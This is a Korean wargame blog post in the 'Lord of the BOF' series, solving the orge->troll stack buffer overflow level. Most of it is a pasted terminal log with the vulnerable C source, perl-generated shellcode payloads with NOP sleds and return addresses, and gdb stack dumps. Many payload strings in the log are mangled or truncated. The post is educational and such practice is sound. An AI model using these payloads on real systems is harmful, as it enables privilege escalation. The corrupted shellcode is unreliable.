그러니까 스택을 미친듯이 크게 늘려서!! 주소가 \xbffe~~가 될때까지!! 그리고 nopsled를 타고 쮹!!!!

진짜 되네요ㅋㅋㄷㄷ

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

skeleton->golem (5)	2014.03.17
vampire->skeleton (2)	2014.02.25
orge->troll (0)	2013.12.21
darkelf->orge (0)	2013.11.22
wolfman->darkelf (0)	2013.11.21

ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ아 미친것같아요.

제가 지금 이걸 삽질한지 한달이 다되가는뎈ㅋㅋㅋㅋ

...하루만에 풀어버렸...

역시 안풀릴때는 처음으로 돌아가서 뭐든 다 날리고 다시시작하세여.

진리여.

밑의 더보기는 제 삽질(멘붕) 로그를 처음부터 끝까지 복붙한거에여.

멘탈건강을 위해 추천하지 않습니다. 밑에 또 정리해서 쓸거거든여.

하다가 멘붕와서 마구 엔터를 누른곳도.. 있기 때문에,

근데 많이 부족하다는걸 느낍니다.... 공부 열심히해야겠어요으어

풀이를 찾아보려고 하다가 아! 한번만 더 해보자! 했는데 풀렸쪙

그리고 스택은 어렵네요 아 머릿속에 그려지면서도 막 더 정보가 들어오면 뒤죽박죽이 됨..

그래서 해공예를 읽고있죠! 이번에 도움이 된것 같습니다ㅋㅋㅋ

login: orge

Password:

Last login: Fri Dec 13 09:58:07 from 192.168.0.1

[orge@localhost orge]$ ls

core

trall

trall.c

troll

troll.c

????????????????????????????????????????1????h??????oh????K述?PTRP4;諡?幾

[orge@localhost orge]$ bash2

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\xd0\xfa\xff\xbf"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[orge@localhost orge]$ dma

bash2: dma: command not found

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./????????????????????????????????????????1????h??????oh?述?PT'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) list

1 rtld.c: No such file or directory.

(gdb) x/wx $esp

0xbffffa00: 0x00000000

(gdb) x/50wx $esp

0xbffffa00: 0x00000000 0xbffffa44 0xbffffa50 0x40013868

0xbffffa10: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa20: 0x08048500 0x00000002 0xbffffa44 0x08048390

0xbffffa30: 0x0804866c 0x4000ae60 0xbffffa3c 0x40013e90

0xbffffa40: 0x00000002 0xbffffb3d 0xbffffb99 0x00000000

0xbffffa50: 0xbffffbca 0xbffffbd9 0xbffffbf0 0xbffffc0f

0xbffffa60: 0xbffffc31 0xbffffc3b 0xbffffdfe 0xbffffe1d

0xbffffa70: 0xbffffe37 0xbffffe4c 0xbffffe68 0xbffffe73

0xbffffa80: 0xbffffe8b 0xbffffe98 0xbffffea0 0xbffffeaa

0xbffffa90: 0xbffffeba 0xbffffec8 0xbffffed6 0xbffffee7

0xbffffaa0: 0xbffffef2 0xbfffff02 0xbfffff42 0x00000000

0xbffffab0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffac0: 0x00000005 0x00000006

(gdb)

0xbffffac8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffad8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffae8: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffaf8: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb08: 0x00000010 0x0febfbff 0x0000000f 0xbffffb38

0xbffffb18: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x36383669 0x902f2e00 0x90909090 0x90909090

0xbffffb48: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb58: 0x90909090 0x90909090 0x90909090 0x31909090

0xbffffb68: 0x68e389c9 0xff978cd0 0x969dd068 0x68e28991

0xbffffb78: 0x6ffff8ff 0xffff9a68 0x10f180ff 0xe24b13f6

0xbffffb88: 0x545091fb 0x3b345052

(gdb) quit

[orge@localhost orge]$ rm *

rm: remove write-protected file `troll'? n

rm: remove write-protected file `troll.c'? n

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8\xff\x68\xd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13xe2\xfb\x91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\x48\xfb\xff\xbf"'`

[orge@localhost orge]$ rm *

rm: remove write-protected file `troll'? n

rm: remove write-protected file `troll.c'? n

[orge@localhost orge]$ ln -s ./troll `perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8\xff\x68\xd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13xe2\xfb\x91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\x48\xfb\xff\xbf"'`

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\x48\xfb\xff\xbf"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault

[orge@localhost orge]$ cat troll.c

/*

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

// here is changed

if(argc != 2){

printf("argc must be two!\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1]));

}

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ gdb trall.c -o trall

gdb: unrecognized option `-o'

Use `gdb --help' for a complete list of options.

[orge@localhost orge]$ gcc trall.c -o trall

[orge@localhost orge]$ rm ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xffxd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\x48\xfb\xff\xbf"'`

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8\xff\x68\xd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13xe2\xfb\x91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'`

[orge@localhost orge]$ ./'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x68\xd0\x9dx91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfb\x91\x50\52\x50\x34\x3b\xff\xe3\xcd\x80"'`

>

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'`

argc must be two!

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./????????????????????????????????????????1????h??????oh?述?PT'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) x/50wx esp

No symbol "esp" in current context.

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54 0xbffffa60 0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54 0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c 0x40013e90

0xbffffa50: 0x00000002 0xbffffb49 0xbffffba1 0x00000000

0xbffffa60: 0xbffffbd2 0xbffffbe1 0xbffffbf8 0xbffffc17

0xbffffa70: 0xbffffc39 0xbffffc43 0xbffffe06 0xbffffe25

0xbffffa80: 0xbffffe3f 0xbffffe54 0xbffffe70 0xbffffe7b

0xbffffa90: 0xbffffe93 0xbffffea0 0xbffffea8 0xbffffeb2

0xbffffaa0: 0xbffffec2 0xbffffed0 0xbffffede 0xbffffeef

0xbffffab0: 0xbffffefa 0xbfffff0a 0xbfffff4a 0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb08: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb18: 0x00000010 0x0febfbff 0x0000000f 0xbffffb44

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffb48: 0x902f2e00 0x90909090 0x90909090 0x90909090

0xbffffb58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb68: 0x90909090 0x90909090 0x31909090 0x68e389c9

0xbffffb78: 0xff978cd0 0x969dd068 0x68e28991 0x6ffff8ff

0xbffffb88: 0xffff9a68 0x10f180ff 0xe24b13f6 0x545091fb

0xbffffb98: 0x3b345052 0x80cde3ff

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x68\xfb\xff\xbf"'`

????????????????????????????????????????????h?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x70\xfb\xff\xbf"'`

????????????????????????????????????????????p?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x69\xfb\xff\xbf"'`

????????????????????????????????????????????i?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xff\x6\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\xfbx50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'` `perl -e 'print "\x90"x44, "\x58\xfb\xff\xbf"'`

????????????????????????????????????????????X?

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./????????????????????????????????????????1????h??????oh?述?PT'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffa07 in ?? ()

(gdb) x/50wx $esp

0xbffff9f0: 0x00000000 0xbffffa08 0xbffff9fc 0x00000000

0xbffffa00: 0x0000009a 0x90000700 0x6e69622f 0x0068732f

0xbffffa10: 0x000000ff 0xbffffa54 0xbffffa60 0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54 0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c 0x40013e90

0xbffffa50: 0x00000002 0xbffffb49 0xbffffba1 0x00000000

0xbffffa60: 0xbffffbd2 0xbffffbe1 0xbffffbf8 0xbffffc17

0xbffffa70: 0xbffffc39 0xbffffc43 0xbffffe06 0xbffffe25

0xbffffa80: 0xbffffe3f 0xbffffe54 0xbffffe70 0xbffffe7b

0xbffffa90: 0xbffffe93 0xbffffea0 0xbffffea8 0xbffffeb2

0xbffffaa0: 0xbffffec2 0xbffffed0 0xbffffede 0xbffffeef

0xbffffab0: 0xbffffefa 0xbfffff0a

(gdb)

0xbffffab8: 0xbfffff4a 0x00000000 0x00000003 0x08048034

0xbffffac8: 0x00000004 0x00000020 0x00000005 0x00000006

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb08: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb18: 0x00000010 0x0febfbff 0x0000000f 0xbffffb44

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffb48: 0x902f2e00 0x90909090 0x90909090 0x90909090

0xbffffb58: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffb68: 0x90909090 0x90909090 0x31909090 0x68e389c9

0xbffffb78: 0xff978cd0 0x969dd068

(gdb)

0xbffffb80: 0x68e28991 0x6ffff8ff 0xffff9a68 0x10f180ff

0xbffffb90: 0xe24b13f6 0x545091fb 0x3b345052 0x80cde3ff

0xbffffba0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000

(gdb) Quit

(gdb) 벼ㅑㅅ

Undefined command: "". Try "help".

(gdb) quit

[orge@localhost orge]$ rm ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xffxd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80", "\x48\xfb\xff\xbf"'`

rm: cannot remove `./????????????????????????????????????????1????h??????oh???TRP4;諡H??: No such file or directory

[orge@localhost orge]$ rm ./`perl -e 'print "\x90"x40, "\x31\xc9\x89\xe3\x68\xd0\x8c\x97\xffxd0\x9d\x96\x91\x89\xe2\x68\xff\xf8\xff\x6f\x68\x9a\xff\xff\xff\x80\xf1\x10\xf6\x13\x4b\xe2\91\x50\x54\x52\x50\x34\x3b\xff\xe3\xcd\x80"'`

[orge@localhost orge]$ ls

core trall trall.c troll troll.c

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

> ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x0\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

>

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\f6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x4\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

>

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\f6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x4\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'``perl -e 'print "\xbf"x48'`

bash2: ./?^12l?u楕凹2핽i00tii0cjo??T??

귁?옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜: No such file or directory

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./?^12l?u楕凹2핽i00tii0cjo??T??

귁? '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) Xshellx/50wx $esp

Undefined command: "Xshellx". Try "help".

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4 0xbffffad0 0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4 0x08048390

0xbffffab0: 0x0804866c 0x4000ae60 0xbffffabc 0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8 0xbffffbeb 0x00000000

0xbffffad0: 0xbffffc1c 0xbffffc2b 0xbffffc42 0xbffffc61

0xbffffae0: 0xbffffc83 0xbffffc8d 0xbffffe50 0xbffffe6f

0xbffffaf0: 0xbffffe89 0xbffffe9e 0xbffffeba 0xbffffec5

0xbffffb00: 0xbffffedd 0xbffffeea 0xbffffef2 0xbffffefc

0xbffffb10: 0xbfffff0c 0xbfffff1a 0xbfffff28 0xbfffff39

0xbffffb20: 0xbfffff44 0xbfffff54 0xbfffff94 0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb)

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e 0xb1c9315e 0x0e6c8032 0xe98001ff

0xbffffbc8: 0xebf67501 0xffeae805 0xc132ffff 0x30306951

0xbffffbd8: 0x30696974 0x8a6f6a63 0x8a5451e4 0x0cb19ae2

0xbffffbe8: 0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb)

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000

(gdb)

0xbffffcd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd18: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd48: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd98: 0x00000000 0x00000000

(gdb)

0xbffffda0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffde0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffdf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe60: 0x00000000 0x00000000

(gdb)

0xbffffe68: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe78: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe88: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffe98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffea8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffeb8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffec8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffed8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffee8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffef8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff28: 0x00000000 0x00000000

(gdb)

0xbfffff30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffa0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffffc0: 0x00000000 0x00000000 0xeb2f2e00 0xc9315e11

0xbfffffd0: 0x6c8032b1 0x8001ff0e 0xf67501e9 0xeae805eb
